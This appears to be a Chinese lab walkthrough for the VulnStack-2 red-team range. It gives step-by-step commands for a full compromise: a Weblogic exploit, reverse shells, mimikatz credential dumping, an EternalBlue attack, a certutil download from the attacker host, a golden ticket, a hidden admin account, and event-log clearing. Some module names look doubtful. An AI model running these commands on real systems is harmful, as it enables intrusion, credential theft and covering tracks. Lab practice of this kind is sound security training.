1. 靶场环境搭建与网络配置
VulnStack-2靶场是一个模拟企业内网环境的红蓝对抗演练平台,包含三台主要主机:WEB服务器、域成员主机和域控制器。这个环境完美复现了企业网络中常见的多网段隔离场景,特别适合练习从外网渗透到内网横向移动的完整攻击链。
1.1 网络拓扑设计
靶场网络采用典型的DMZ+内网架构:
- DMZ区(192.168.44.0/24):放置对外提供服务的WEB服务器
- 内网区(10.10.10.0/24):包含域成员主机和域控制器
- 防火墙策略:仅允许外部访问DMZ区,内网主机无法直接连接外网
这种设计模拟了真实企业网络中的安全分区策略,攻击者需要先突破DMZ区服务器,再以此为跳板进行内网横向渗透。
1.2 主机角色与配置
1.2.1 WEB服务器配置
WEB服务器(WEB.de1ay)采用双网卡设计:
- 外网卡:192.168.44.163(NAT模式)
- 内网卡:10.10.10.10(仅主机模式)
关键服务:
- Weblogic中间件(7001端口)
- 默认管理员账户:weblogic/weblogic
配置要点:
- 安装Oracle Weblogic 10.3.6
- 创建base_domain域
- 启动管理控制台服务
1.2.2 域成员主机配置
PC.de1ay同样配置双网卡:
- 外网卡:192.168.44.164
- 内网卡:10.10.10.11
系统配置:
- 加入de1ay.com域
- 本地管理员:de1ay\administrator
- 密码:1qaz@WSX
1.2.3 域控制器配置
DC.de1ay仅配置内网卡:
- IP地址:10.10.10.12
- 域管理员:administrator@de1ay.com
- 密码:1qaz@WSX
域服务:
- Active Directory域服务
- DNS服务
- DHCP服务(可选)
2. 外网渗透与初始访问
2.1 信息收集与漏洞扫描
使用Kali Linux(192.168.44.146)对目标进行扫描:
bash复制# 快速存活检测
nmap -sP 192.168.44.0/24
# 全面端口扫描
nmap -sC -sV -A -T4 -p- 192.168.44.163
扫描结果分析:
- 7001端口:Weblogic控制台
- 445端口:SMB文件共享
- 3389端口:远程桌面
- 1433端口:SQL Server
2.2 Weblogic漏洞利用
Weblogic存在多个历史漏洞:
- 控制台弱口令(weblogic/weblogic)
- CVE-2017-3506(XMLDecoder反序列化)
- CVE-2018-2894(任意文件上传)
使用反序列化漏洞获取webshell:
bash复制msfconsole
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set RHOSTS 192.168.44.163
set RPORT 7001
set TARGETURI /wls-wsat/CoordinatorPortType
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.44.146
exploit
成功获取meterpreter会话后,上传MSF生成的payload:
bash复制msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.146 LPORT=4444 -f exe > shell.exe
upload shell.exe C:\\Windows\\Temp\\
2.3 权限提升与持久化
获取初始shell后,通常需要提权至SYSTEM:
bash复制getsystem
创建持久化后门:
bash复制run persistence -X -i 60 -p 4444 -r 192.168.44.146
3. 内网横向移动
3.1 内网信息收集
获取内网拓扑信息:
cmd复制ipconfig /all
arp -a
net view /domain
查询域信息:
cmd复制net group "Domain Admins" /domain
net group "Domain Computers" /domain
3.2 密码哈希提取
使用mimikatz提取凭据:
bash复制load kiwi
creds_all
lsa_dump_sam
或者使用MSF内置模块:
bash复制use post/windows/gather/smart_hashdump
set SESSION 1
run
3.3 横向渗透技术
3.3.1 SMB协议利用
检测MS17-010漏洞:
bash复制use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.10.12
run
利用永恒之蓝攻击域控:
bash复制use exploit/windows/smb/ms17_010_psexec
set RHOST 10.10.10.12
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 443
run
3.3.2 WMI远程执行
使用wmic进行横向移动:
cmd复制wmic /node:10.10.10.11 /user:de1ay\administrator /password:1qaz@WSX process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.44.146/shell.exe C:\\Windows\\Temp\\shell.exe"
3.3.3 计划任务攻击
创建远程计划任务:
cmd复制schtasks /create /s 10.10.10.11 /u de1ay\administrator /p 1qaz@WSX /tn "Update" /tr "C:\\Windows\\Temp\\shell.exe" /sc once /st 00:00
schtasks /run /s 10.10.10.11 /u de1ay\administrator /p 1qaz@WSX /tn "Update"
4. 域渗透与权限维持
4.1 黄金票据攻击
获取域控权限后,提取krbtgt账户哈希:
bash复制lsa_dump_secrets
生成黄金票据:
bash复制golden_ticket_create -u administrator -d de1ay.com -s S-1-5-21-123456789-1234567890-123456789 -k 82dfc71b72a11ef37d663047bc2088fb -t /root/golden.tkt
使用黄金票据访问域资源:
bash复制kerberos_ticket_use /root/golden.tkt
4.2 权限维持技术
4.2.1 创建隐藏账户
cmd复制net user hacker$ P@ssw0rd /add /domain
net group "Domain Admins" hacker$ /add /domain
4.2.2 SID History注入
bash复制use post/windows/manage/sid_inject
set DOMAIN de1ay.com
set USER hacker
set SID S-1-5-21-123456789-1234567890-123456789
set SESSION 1
run
4.2.3 DCShadow攻击
bash复制use post/windows/manage/dcshadow
set OBJECTDN CN=Admin,CN=Users,DC=de1ay,DC=com
set ATTRIBUTE userAccountControl
set VALUE 512
set SESSION 1
run
5. 防御与检测建议
5.1 攻击痕迹清理
清除日志记录:
cmd复制wevtutil cl system
wevtutil cl security
wevtutil cl application
删除文件痕迹:
cmd复制del /f /q C:\\Windows\\Temp\\shell.exe
5.2 防御措施建议
-
Weblogic安全加固:
- 修改默认密码
- 及时安装补丁
- 限制控制台访问IP
-
域安全策略:
- 启用LSA保护
- 配置受限组策略
- 监控异常Kerberos票据
-
网络隔离:
- 严格划分安全域
- 配置防火墙ACL
- 禁用不必要的协议
6. 实战经验总结
在本次靶场演练中,有几个关键点值得特别注意:
-
信息收集要全面:不要只关注漏洞扫描结果,系统配置、网络拓扑、用户习惯等信息同样重要。
-
权限维持要隐蔽:黄金票据虽然强大,但容易被检测。在实际环境中,建议结合多种权限维持技术。
-
横向移动要谨慎:内网环境中,不当的横向移动可能触发安全告警。建议先充分收集信息,再制定精确的攻击路径。
-
痕迹清理要彻底:特别是域控制器上的操作日志,一定要仔细检查是否清理干净。
这个靶场完美模拟了从外网渗透到内网横向移动的完整攻击链,通过实践这些技术,可以深入理解企业内网的安全防御体系,为实际工作中的安全防护提供宝贵经验。